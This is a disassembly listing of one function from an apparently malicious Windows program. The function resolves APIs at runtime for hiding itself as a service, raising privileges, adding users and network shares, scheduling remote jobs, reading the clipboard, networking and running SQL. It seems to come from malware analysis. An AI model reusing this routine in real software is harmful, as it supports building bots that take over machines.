Assembly Code of File sub_40468E
sub_40468E proc near ; CODE XREF: sub_40D1EF + 4B�p
push ebx
push ebp
mov ebp, ds:dword_41F078
push esi
push edi
push offset aKernel32_dll ; \"kernel32.dll\"
call ebp ; GetModuleHandleA
mov esi, ds:dword_41F074
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_4047AE
push offset aSeterrormode ; \"SetErrorMode\"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; \"CreateToolhelp32Snapshot\"
push edi
mov dword_433478, eax
call esi ; GetProcAddress
push offset aProcess32first ; \"Process32First\"
push edi
mov dword_433490, eax
call esi ; GetProcAddress
push offset aProcess32next ; \"Process32Next\"
push edi
mov dword_4334EC, eax
call esi ; GetProcAddress
push offset aModule32first ; \"Module32First\"
push edi
mov dword_433450, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; \"GetDiskFreeSpaceExA\"
push edi
mov dword_4334B8, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; \"GetLogicalDriveStringsA\"
push edi
mov dword_43349C, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; \"GetDriveTypeA\"
push edi
mov dword_43353C, eax
call esi ; GetProcAddress
push offset aSearchpatha ; \"SearchPathA\"
push edi
mov dword_43342C, eax
call esi ; GetProcAddress
push offset aQueryperforman ; \"QueryPerformanceCounter\"
push edi
mov dword_4334C0, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; \"QueryPerformanceFrequency\"
push edi
mov dword_4334E4, eax
call esi ; GetProcAddress
cmp dword_433478, ebx
mov dword_433548, eax
jz short loc_40478C
cmp dword_433490, ebx
jz short loc_40478C
cmp dword_4334EC, ebx
jz short loc_40478C
cmp dword_433450, ebx
jz short loc_40478C
cmp dword_43349C, ebx
jz short loc_40478C
cmp dword_43353C, ebx
jz short loc_40478C
cmp dword_43342C, ebx
jz short loc_40478C
cmp dword_4334C0, ebx
jz short loc_40478C
cmp dword_4334E4, ebx
jz short loc_40478C
cmp eax, ebx
jnz short loc_404796
loc_40478C: ; CODE XREF: sub_40468E + B8�j
; sub_40468E + C0�j ...
mov dword_4335F0, 1
loc_404796: ; CODE XREF: sub_40468E + FC�j
push offset aRegisterservic ; \"RegisterServiceProcess\"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_43359C, eax
jz short loc_4047C3
push 1
push ebx
call eax ; GetDiskFreeSpaceExA
jmp short loc_4047C3
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4047AE: ; CODE XREF: sub_40468E + 1D�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_4335F4, eax
mov dword_4335F0, 1
loc_4047C3: ; CODE XREF: sub_40468E + 117�j
; sub_40468E + 11E�j
push offset aUser32_dll ; \"user32.dll\"
call ds:dword_41F070 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40487E
push offset aSendmessagea ; \"SendMessageA\"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; \"FindWindowA\"
push edi
mov dword_433560, eax
call esi ; GetProcAddress
push offset aIswindow ; \"IsWindow\"
push edi
mov dword_4334F8, eax
call esi ; GetProcAddress
push offset aDestroywindow ; \"DestroyWindow\"
push edi
mov dword_433434, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; \"OpenClipboard\"
push edi
mov dword_433498, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; \"GetClipboardData\"
push edi
mov dword_43344C, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; \"CloseClipboard\"
push edi
mov dword_4335CC, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; \"ExitWindowsEx\"
push edi
mov dword_433430, eax
call esi ; GetProcAddress
cmp dword_433560, ebx
mov dword_433538, eax
jz short loc_404889
cmp dword_4334F8, ebx
jz short loc_404889
cmp dword_433434, ebx
jz short loc_404889
cmp dword_433498, ebx
jz short loc_404889
cmp dword_43344C, ebx
jz short loc_404889
cmp dword_4335CC, ebx
jz short loc_404889
cmp dword_433430, ebx
jz short loc_404889
cmp eax, ebx
jnz short loc_404893
jmp short loc_404889
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_40487E: ; CODE XREF: sub_40468E + 144�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_4335FC, eax
loc_404889: ; CODE XREF: sub_40468E + 1B8�j
; sub_40468E + 1C0�j ...
mov dword_4335F8, 1
loc_404893: ; CODE XREF: sub_40468E + 1EC�j
push offset aAdvapi32_dll ; \"advapi32.dll\"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_404A2E
push offset aRegopenkeyexa ; \"RegOpenKeyExA\"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; \"RegCreateKeyExA\"
push edi
mov dword_4335C8, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; \"RegSetValueExA\"
push edi
mov dword_4334E8, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; \"RegQueryValueExA\"
push edi
mov dword_433484, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; \"RegDeleteValueA\"
push edi
mov dword_433460, eax
call esi ; GetProcAddress
push offset aRegclosekey ; \"RegCloseKey\"
push edi
mov dword_4334DC, eax
call esi ; GetProcAddress
cmp dword_4335C8, ebx
mov dword_43357C, eax
jz short loc_40491E
cmp dword_4334E8, ebx
jz short loc_40491E
cmp dword_433484, ebx
jz short loc_40491E
cmp dword_433460, ebx
jz short loc_40491E
cmp dword_4334DC, ebx
jz short loc_40491E
cmp eax, ebx
jnz short loc_404928
loc_40491E: ; CODE XREF: sub_40468E + 26A�j
; sub_40468E + 272�j ...
mov dword_433600, 1
loc_404928: ; CODE XREF: sub_40468E + 28E�j
push offset aOpenprocesstok ; \"OpenProcessToken\"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; \"LookupPrivilegeValueA\"
push edi
mov dword_4335D4, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; \"AdjustTokenPrivileges\"
push edi
mov dword_4335BC, eax
call esi ; GetProcAddress
cmp dword_4335D4, ebx
mov dword_433508, eax
jz short loc_404963
cmp dword_4335BC, ebx
jz short loc_404963
cmp eax, ebx
jnz short loc_40496D
loc_404963: ; CODE XREF: sub_40468E + 2C7�j
; sub_40468E + 2CF�j
mov dword_433600, 1
loc_40496D: ; CODE XREF: sub_40468E + 2D3�j
push offset aOpenscmanagera ; \"OpenSCManagerA\"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; \"OpenServiceA\"
push edi
mov dword_43355C, eax
call esi ; GetProcAddress
push offset aStartservicea ; \"StartServiceA\"
push edi
mov dword_4335D8, eax
call esi ; GetProcAddress
push offset aControlservice ; \"ControlService\"
push edi
mov dword_433564, eax
call esi ; GetProcAddress
push offset aDeleteservice ; \"DeleteService\"
push edi
mov dword_433580, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; \"CloseServiceHandle\"
push edi
mov dword_433494, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; \"EnumServicesStatusA\"
push edi
mov dword_4334D0, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; \"IsValidSecurityDescriptor\"
push edi
mov dword_43356C, eax
call esi ; GetProcAddress
cmp dword_43355C, ebx
mov dword_433598, eax
jz short loc_404A11
cmp dword_4335D8, ebx
jz short loc_404A11
cmp dword_433564, ebx
jz short loc_404A11
cmp dword_433580, ebx
jz short loc_404A11
cmp dword_433494, ebx
jz short loc_404A11
cmp dword_4334D0, ebx
jz short loc_404A11
cmp dword_43356C, ebx
jz short loc_404A11
cmp eax, ebx
jnz short loc_404A1B
loc_404A11: ; CODE XREF: sub_40468E + 34D�j
; sub_40468E + 355�j ...
mov dword_433600, 1
loc_404A1B: ; CODE XREF: sub_40468E + 381�j
push offset aGetusernamea ; \"GetUserNameA\"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_433530, eax
jnz short loc_404A43
jmp short loc_404A39
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_404A2E: ; CODE XREF: sub_40468E + 210�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433604, eax
loc_404A39: ; CODE XREF: sub_40468E + 39E�j
mov dword_433600, 1
loc_404A43: ; CODE XREF: sub_40468E + 39C�j
push offset aGdi32_dll ; \"gdi32.dll\"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_404B0F
push offset aCreatedca ; \"CreateDCA\"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; \"CreateDIBSection\"
push edi
mov dword_4335DC, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; \"CreateCompatibleDC\"
push edi
mov dword_4335B0, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; \"GetDeviceCaps\"
push edi
mov dword_433518, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; \"GetDIBColorTable\"
push edi
mov dword_433510, eax
call esi ; GetProcAddress
push offset aSelectobject ; \"SelectObject\"
push edi
mov dword_433554, eax
call esi ; GetProcAddress
push offset aBitblt ; \"BitBlt\"
push edi
mov dword_43343C, eax
call esi ; GetProcAddress
push offset aDeletedc ; \"DeleteDC\"
push edi
mov dword_433528, eax
call esi ; GetProcAddress
push offset aDeleteobject ; \"DeleteObject\"
push edi
mov dword_4334CC, eax
call esi ; GetProcAddress
cmp dword_4335DC, ebx
mov dword_43351C, eax
jz short loc_404B1A
cmp dword_4335B0, ebx
jz short loc_404B1A
cmp dword_433518, ebx
jz short loc_404B1A
cmp dword_433510, ebx
jz short loc_404B1A
cmp dword_433554, ebx
jz short loc_404B1A
cmp dword_43343C, ebx
jz short loc_404B1A
cmp dword_433528, ebx
jz short loc_404B1A
cmp dword_4334CC, ebx
jz short loc_404B1A
cmp eax, ebx
jnz short loc_404B24
jmp short loc_404B1A
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_404B0F: ; CODE XREF: sub_40468E + 3C0�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43360C, eax
loc_404B1A: ; CODE XREF: sub_40468E + 441�j
; sub_40468E + 449�j ...
mov dword_433608, 1
loc_404B24: ; CODE XREF: sub_40468E + 47D�j
mov ebp, ds:dword_41F070
push offset aWs2_32_dll ; \"ws2_32.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_404DE0
push offset aWsastartup ; \"WSAStartup\"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; \"WSASocketA\"
push edi
mov dword_4334B0, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; \"WSAAsyncSelect\"
push edi
mov dword_433424, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; \"__WSAFDIsSet\"
push edi
mov dword_43352C, eax
call esi ; GetProcAddress
push offset aWsaioctl ; \"WSAIoctl\"
push edi
mov dword_4334F4, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; \"WSAGetLastError\"
push edi
mov dword_433574, eax
call esi ; GetProcAddress
push offset aWsacleanup ; \"WSACleanup\"
push edi
mov dword_433558, eax
call esi ; GetProcAddress
push offset aSocket ; \"socket\"
push edi
mov dword_4335B8, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; \"ioctlsocket\"
push edi
mov dword_4334A0, eax
call esi ; GetProcAddress
push offset aConnect ; \"connect\"
push edi
mov dword_433444, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; \"inet_ntoa\"
push edi
mov dword_433458, eax
call esi ; GetProcAddress
push offset aInet_addr ; \"inet_addr\"
push edi
mov dword_433520, eax
call esi ; GetProcAddress
push offset aHtons ; \"htons\"
push edi
mov dword_433514, eax
call esi ; GetProcAddress
push offset aHtonl ; \"htonl\"
push edi
mov dword_4335EC, eax
call esi ; GetProcAddress
push offset aNtohs ; \"ntohs\"
push edi
mov dword_4335C4, eax
call esi ; GetProcAddress
push offset aNtohl ; \"ntohl\"
push edi
mov dword_433594, eax
call esi ; GetProcAddress
push offset aSend ; \"send\"
push edi
mov dword_433570, eax
call esi ; GetProcAddress
push offset aSendto ; \"sendto\"
push edi
mov dword_433534, eax
call esi ; GetProcAddress
push offset aRecv ; \"recv\"
push edi
mov dword_433470, eax
call esi ; GetProcAddress
push offset aRecvfrom ; \"recvfrom\"
push edi
mov dword_433414, eax
call esi ; GetProcAddress
mov dword_433438, eax
push offset aBind ; \"bind\"
push edi
call esi ; GetProcAddress
push offset aSelect ; \"select\"
push edi
mov dword_433578, eax
call esi ; GetProcAddress
push offset aListen ; \"listen\"
push edi
mov dword_433544, eax
call esi ; GetProcAddress
push offset aAccept ; \"accept\"
push edi
mov dword_4335C0, eax
call esi ; GetProcAddress
push offset aSetsockopt ; \"setsockopt\"
push edi
mov dword_433464, eax
call esi ; GetProcAddress
push offset aGetsockname ; \"getsockname\"
push edi
mov dword_4334BC, eax
call esi ; GetProcAddress
push offset aGethostname ; \"gethostname\"
push edi
mov dword_433418, eax
call esi ; GetProcAddress
push offset aGethostbyname ; \"gethostbyname\"
push edi
mov dword_4335B4, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; \"gethostbyaddr\"
push edi
mov dword_433500, eax
call esi ; GetProcAddress
push offset aGetpeername ; \"getpeername\"
push edi
mov dword_433590, eax
call esi ; GetProcAddress
push offset aClosesocket ; \"closesocket\"
push edi
mov dword_4334E0, eax
call esi ; GetProcAddress
cmp dword_4334B0, ebx
mov dword_4335AC, eax
jz loc_404DEB
cmp dword_433424, ebx
jz loc_404DEB
cmp dword_43352C, ebx
jz loc_404DEB
cmp dword_433574, ebx
jz loc_404DEB
cmp dword_433558, ebx
jz loc_404DEB
cmp dword_4335B8, ebx
jz loc_404DEB
cmp dword_4334A0, ebx
jz loc_404DEB
cmp dword_433444, ebx
jz loc_404DEB
cmp dword_433458, ebx
jz loc_404DEB
cmp dword_433520, ebx
jz loc_404DEB
cmp dword_433514, ebx
jz loc_404DEB
cmp dword_4335EC, ebx
jz loc_404DEB
cmp dword_4335C4, ebx
jz loc_404DEB
cmp dword_433594, ebx
jz short loc_404DEB
cmp dword_433534, ebx
jz short loc_404DEB
cmp dword_433470, ebx
jz short loc_404DEB
cmp dword_433414, ebx
jz short loc_404DEB
cmp dword_433438, ebx
jz short loc_404DEB
cmp dword_433578, ebx
jz short loc_404DEB
cmp dword_433544, ebx
jz short loc_404DEB
cmp dword_4335C0, ebx
jz short loc_404DEB
cmp dword_433464, ebx
jz short loc_404DEB
cmp dword_4334BC, ebx
jz short loc_404DEB
cmp dword_433418, ebx
jz short loc_404DEB
cmp dword_4335B4, ebx
jz short loc_404DEB
cmp dword_433500, ebx
jz short loc_404DEB
cmp dword_433590, ebx
jz short loc_404DEB
cmp eax, ebx
jnz short loc_404DF5
jmp short loc_404DEB
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_404DE0: ; CODE XREF: sub_40468E + 4A7�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433614, eax
loc_404DEB: ; CODE XREF: sub_40468E + 646�j
; sub_40468E + 652�j ...
mov dword_433610, 1
loc_404DF5: ; CODE XREF: sub_40468E + 74E�j
push offset aWininet_dll ; \"wininet.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_404EFA
push offset aInternetgetcon ; \"InternetGetConnectedState\"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; \"InternetGetConnectedStateEx\"
push edi
mov dword_433428, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; \"HttpOpenRequestA\"
push edi
mov dword_4335E8, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; \"HttpSendRequestA\"
push edi
mov dword_4334C8, eax
call esi ; GetProcAddress
push offset aInternetconnec ; \"InternetConnectA\"
push edi
mov dword_4335E4, eax
call esi ; GetProcAddress
push offset aInternetopena ; \"InternetOpenA\"
push edi
mov dword_4334D4, eax
call esi ; GetProcAddress
push offset aInternetopenur ; \"InternetOpenUrlA\"
push edi
mov dword_433448, eax
call esi ; GetProcAddress
push offset aInternetcracku ; \"InternetCrackUrlA\"
push edi
mov dword_4334A8, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; \"InternetReadFile\"
push edi
mov dword_433420, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; \"InternetCloseHandle\"
push edi
mov dword_43354C, eax
call esi ; GetProcAddress
cmp dword_433428, ebx
mov ecx, dword_433448
mov dword_4334FC, eax
jz short loc_404ED6
cmp dword_4335E8, ebx
jz short loc_404ED6
cmp dword_4334C8, ebx
jz short loc_404ED6
cmp dword_4335E4, ebx
jz short loc_404ED6
cmp dword_4334D4, ebx
jz short loc_404ED6
cmp ecx, ebx
jz short loc_404ED6
cmp dword_4334A8, ebx
jz short loc_404ED6
cmp dword_433420, ebx
jz short loc_404ED6
cmp dword_43354C, ebx
jz short loc_404ED6
cmp eax, ebx
jnz short loc_404EE0
loc_404ED6: ; CODE XREF: sub_40468E + 806�j
; sub_40468E + 80E�j ...
mov dword_433618, 1
loc_404EE0: ; CODE XREF: sub_40468E + 846�j
cmp ecx, ebx
jz short loc_404F15
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; \"Mozilla/4.0 (compatible)\"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_4335E0, eax
jnz short loc_404F15
jmp short loc_404F0F
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_404EFA: ; CODE XREF: sub_40468E + 772�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43361C, eax
mov dword_433618, 1
loc_404F0F: ; CODE XREF: sub_40468E + 86A�j
mov dword_4335E0, ebx
loc_404F15: ; CODE XREF: sub_40468E + 854�j
; sub_40468E + 868�j
push offset aIcmp_dll ; \"icmp.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_404F5F
push offset aIcmpcreatefile ; \"IcmpCreateFile\"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; \"IcmpCloseHandle\"
push edi
mov dword_4334F0, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; \"IcmpSendEcho\"
push edi
mov dword_433524, eax
call esi ; GetProcAddress
cmp dword_4334F0, ebx
mov dword_433588, eax
jz short loc_404F6A
cmp dword_433524, ebx
jz short loc_404F6A
cmp eax, ebx
jnz short loc_404F74
jmp short loc_404F6A
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_404F5F: ; CODE XREF: sub_40468E + 892�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433624, eax
loc_404F6A: ; CODE XREF: sub_40468E + 8C1�j
; sub_40468E + 8C9�j ...
mov dword_433620, 1
loc_404F74: ; CODE XREF: sub_40468E + 8CD�j
push offset aNetapi32_dll ; \"netapi32.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40506A
push offset aNetshareadd ; \"NetShareAdd\"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; \"NetShareDel\"
push edi
mov dword_433488, eax
call esi ; GetProcAddress
push offset aNetshareenum ; \"NetShareEnum\"
push edi
mov dword_4334A4, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; \"NetScheduleJobAdd\"
push edi
mov dword_4335A0, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; \"NetApiBufferFree\"
push edi
mov dword_433454, eax
call esi ; GetProcAddress
push offset aNetremotetod ; \"NetRemoteTOD\"
push edi
mov dword_4334D8, eax
call esi ; GetProcAddress
push offset aNetuseradd ; \"NetUserAdd\"
push edi
mov dword_43341C, eax
call esi ; GetProcAddress
push offset aNetuserdel ; \"NetUserDel\"
push edi
mov dword_43346C, eax
call esi ; GetProcAddress
push offset aNetuserenum ; \"NetUserEnum\"
push edi
mov dword_433568, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; \"NetUserGetInfo\"
push edi
mov dword_433480, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; \"NetMessageBufferSend\"
push edi
mov dword_43348C, eax
call esi ; GetProcAddress
cmp dword_433488, ebx
mov dword_4334B4, eax
jz short loc_405075
cmp dword_4334A4, ebx
jz short loc_405075
cmp dword_4335A0, ebx
jz short loc_405075
cmp dword_433454, ebx
jz short loc_405075
cmp dword_4334D8, ebx
jz short loc_405075
cmp dword_43341C, ebx
jz short loc_405075
cmp dword_43346C, ebx
jz short loc_405075
cmp dword_433568, ebx
jz short loc_405075
cmp dword_433480, ebx
jz short loc_405075
cmp dword_43348C, ebx
jz short loc_405075
cmp eax, ebx
jnz short loc_40507F
jmp short loc_405075
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_40506A: ; CODE XREF: sub_40468E + 8F1�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43362C, eax
loc_405075: ; CODE XREF: sub_40468E + 98C�j
; sub_40468E + 994�j ...
mov dword_433628, 1
loc_40507F: ; CODE XREF: sub_40468E + 9D8�j
push offset aDnsapi_dll ; \"dnsapi.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4050B4
push offset aDnsflushresolv ; \"DnsFlushResolverCache\"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; \"DnsFlushResolverCacheEntry_A\"
push edi
mov dword_433584, eax
call esi ; GetProcAddress
cmp dword_433584, ebx
mov dword_433504, eax
jz short loc_4050BF
cmp eax, ebx
jnz short loc_4050C9
jmp short loc_4050BF
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4050B4: ; CODE XREF: sub_40468E + 9FC�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433634, eax
loc_4050BF: ; CODE XREF: sub_40468E + A1E�j
; sub_40468E + A24�j
mov dword_433630, 1
loc_4050C9: ; CODE XREF: sub_40468E + A22�j
push offset aIphlpapi_dll ; \"iphlpapi.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4050FE
push offset aGetipnettable ; \"GetIpNetTable\"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; \"DeleteIpNetEntry\"
push edi
mov dword_4334AC, eax
call esi ; GetProcAddress
cmp dword_4334AC, ebx
mov dword_43350C, eax
jz short loc_405109
cmp eax, ebx
jnz short loc_405113
jmp short loc_405109
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4050FE: ; CODE XREF: sub_40468E + A46�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43363C, eax
loc_405109: ; CODE XREF: sub_40468E + A68�j
; sub_40468E + A6E�j
mov dword_433638, 1
loc_405113: ; CODE XREF: sub_40468E + A6C�j
push offset aMpr_dll ; \"mpr.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_405172
push offset aWnetaddconnect ; \"WNetAddConnection2A\"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; \"WNetAddConnection2W\"
push edi
mov dword_433540, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; \"WNetCancelConnection2A\"
push edi
mov dword_4335D0, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; \"WNetCancelConnection2W\"
push edi
mov dword_43347C, eax
call esi ; GetProcAddress
cmp dword_433540, ebx
mov dword_433440, eax
jz short loc_40517D
cmp dword_4335D0, ebx
jz short loc_40517D
cmp dword_43347C, ebx
jz short loc_40517D
cmp eax, ebx
jnz short loc_405187
jmp short loc_40517D
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_405172: ; CODE XREF: sub_40468E + A90�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433644, eax
loc_40517D: ; CODE XREF: sub_40468E + ACC�j
; sub_40468E + AD4�j ...
mov dword_433640, 1
loc_405187: ; CODE XREF: sub_40468E + AE0�j
push offset aShell32_dll ; \"shell32.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4051BC
push offset aShellexecutea ; \"ShellExecuteA\"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; \"SHChangeNotify\"
push edi
mov dword_4335A8, eax
call esi ; GetProcAddress
cmp dword_4335A8, ebx
mov dword_433474, eax
jz short loc_4051C7
cmp eax, ebx
jnz short loc_4051D1
jmp short loc_4051C7
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_4051BC: ; CODE XREF: sub_40468E + B04�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43364C, eax
loc_4051C7: ; CODE XREF: sub_40468E + B26�j
; sub_40468E + B2C�j
mov dword_433648, 1
loc_4051D1: ; CODE XREF: sub_40468E + B2A�j
push offset aOdbc32_dll ; \"odbc32.dll\"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40525A
push offset aSqldriverconne ; \"SQLDriverConnect\"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; \"SQLSetEnvAttr\"
push edi
mov dword_43358C, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; \"SQLExecDirect\"
push edi
mov dword_43345C, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; \"SQLAllocHandle\"
push edi
mov dword_4335A4, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; \"SQLFreeHandle\"
push edi
mov dword_4334C4, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; \"SQLDisconnect\"
push edi
mov dword_433550, eax
call esi ; GetProcAddress
cmp dword_43358C, ebx
mov dword_433468, eax
jz short loc_405265
cmp dword_43345C, ebx
jz short loc_405265
cmp dword_4335A4, ebx
jz short loc_405265
cmp dword_4334C4, ebx
jz short loc_405265
cmp dword_433550, ebx
jz short loc_405265
cmp eax, ebx
jnz short loc_40526F
jmp short loc_405265
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_40525A: ; CODE XREF: sub_40468E + B4E�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433654, eax
loc_405265: ; CODE XREF: sub_40468E + BA4�j
; sub_40468E + BAC�j ...
mov dword_433650, 1
loc_40526F: ; CODE XREF: sub_40468E + BC8�j
pop edi
pop esi
xor eax, eax
pop ebp
inc eax
pop ebx
retn
sub_40468E endp